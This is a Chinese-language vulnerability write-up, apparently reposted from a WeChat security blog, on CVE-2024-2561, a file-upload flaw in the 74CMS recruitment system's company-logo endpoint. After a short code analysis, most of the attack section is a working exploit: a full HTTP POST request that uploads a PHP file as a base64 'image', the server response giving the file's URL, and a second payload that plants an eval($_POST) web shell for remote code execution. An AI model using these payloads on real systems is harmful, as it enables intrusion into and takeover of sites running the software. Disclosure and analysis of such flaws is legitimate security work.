74CMS人才系统存在RCE CVE-2024-2561
前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请联系。
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
漏洞详情
源代码获取处
https://www.74cms.com/download/detail/161.html漏洞代码存在位置
application/v1_0/controller/company/Index.php#sendCompanyLogo漏洞分析
// 生成企业logopublic function sendCompanyLogo(){$imgBase64 = input('post.imgBase64/s','','trim');$company_id = 100;if (preg_match('/^(data:s*image/(w+);base64,)/',$imgBase64,$res)) {//获取图片类型$type = $res[2];//图片保存路径$new_file = "upload/company_logo/".$company_id.'/';if (!file_exists($new_file)) {mkdir($new_file,0755,true);}//图片名字$new_file = $new_file.time().'.'.$type;if (file_put_contents($new_file,base64_decode(str_replace($res[1],'', $imgBase64)))) {$id = model('Uploadfile')->insertGetId(['save_path' => substr($new_file,6),'platform' => 'default','addtime' => time()]);$arr = ['file_id' => $id,'file_url' => config('global_config.sitedomain').'/'.$new_file];$this->ajaxReturn(200,'生成成功',$arr);} else {$this->ajaxReturn(500,'生成失败');}}}
上面看出,只需通过 POST 方法传递一个 imgBase64 参数内容就能完成恶意文件上传,不需要任何 waf等。
imgBase64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==此外,此路由还具有身份验证,像函数 application/v1_0/controller/company/Index.php#_initialize 中所述。
public function _initialize(){parent::_initialize();$this->checkLogin(1);}
按照 checkLogin该函数,地址为 application/v1_0/controller/common/Base.php。
public function checkLogin($need_utype = 0){if ($need_utype == 0) {$code = 50009;$tip = '请先登录';} else {$tip ='当前操作需要登录' .($need_utype == 1 ? '企业' : '个人') .'会员';$code = $need_utype==1?50011:50010;}if ($this->userinfo === null ||($need_utype > 0 && $this->userinfo->utype != $need_utype)) {$this->ajaxReturn($code, $tip);}// ...}
这个功能是需要作为公司成员前提,但这非常简单,因为它是一个前端网站,任何人都可以注册为公司成员。
从官方演示网站上可以清楚地看出:https://74cmsse.xxxxx.com/member/reg/company 他们允许任何人注册为公司用户。
当在完成公司成员注册后,发送以下EXP就可以完成上传。
POST /v1_0/company/index/sendCompanyLogo HTTP/1.1Host: localhost:7888Cache-Control: max-age=0sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "macOS"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36user-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MDk4MTY4MDcsImV4cCI6MTc0MTAyODgwNywiaW5mbyI6eyJ1aWQiOjEsInV0eXBlIjoxLCJtb2JpbGUiOiIxNTIxMjM0NTY3OCJ9fQ.8MYJ6e8qOGCR6s3pTIlFLsWFgAhC4f-F8XH_VNaC5BQAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: qscms_visitor=%7B%22utype%22%3A1%2C%22mobile%22%3A%2215212345678%22%2C%22token%22%3A%22eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MDk4MTY4MDcsImV4cCI6MTc0MTAyODgwNywiaW5mbyI6eyJ1aWQiOjEsInV0eXBlIjoxLCJtb2JpbGUiOiIxNTIxMjM0NTY3OCJ9fQ.8MYJ6e8qOGCR6s3pTIlFLsWFgAhC4f-F8XH_VNaC5BQ%22%7DConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 56imgBase64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==
HTTP/1.1 200 OKServer: nginx/1.19.2Date: Thu, 07 Mar 2024 13:53:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.1.20Access-Control-Allow-Origin:Access-Control-Allow-Methods: POST,OPTIONS,GETAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: x-requested-with,content-type,x-token,safecode,sessionid,admintoken,user-token,platform,subsiteidSet-Cookie: qscms_visitor=%7B%22utype%22%3A1%2C%22mobile%22%3A%2215212345678%22%2C%22token%22%3A%22eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MDk4MTY4MDcsImV4cCI6MTc0MTAyODgwNywiaW5mbyI6eyJ1aWQiOjEsInV0eXBlIjoxLCJtb2JpbGUiOiIxNTIxMjM0NTY3OCJ9fQ.8MYJ6e8qOGCR6s3pTIlFLsWFgAhC4f-F8XH_VNaC5BQ%22%7D; expires=Thu, 14-Mar-2024 13:53:11 GMT; Max-Age=604800; path=/Content-Length: 141{"code":200,"message":"生成成功","data":{"file_id":"14","file_url":"http://localhost:7888/upload/company_logo/100/1709819591.php"}}
当然,也可以替换上面的imgBase64内容,在上面只是用phpinfo()进行测试。
比如 <?php eval($_POST[1]);imgBase64=data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==
这样就可以rce了~
原文始发于微信公众号(不秃头的安全):漏洞分析 | 74CMS人才系统存在RCE CVE-2024-2561
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论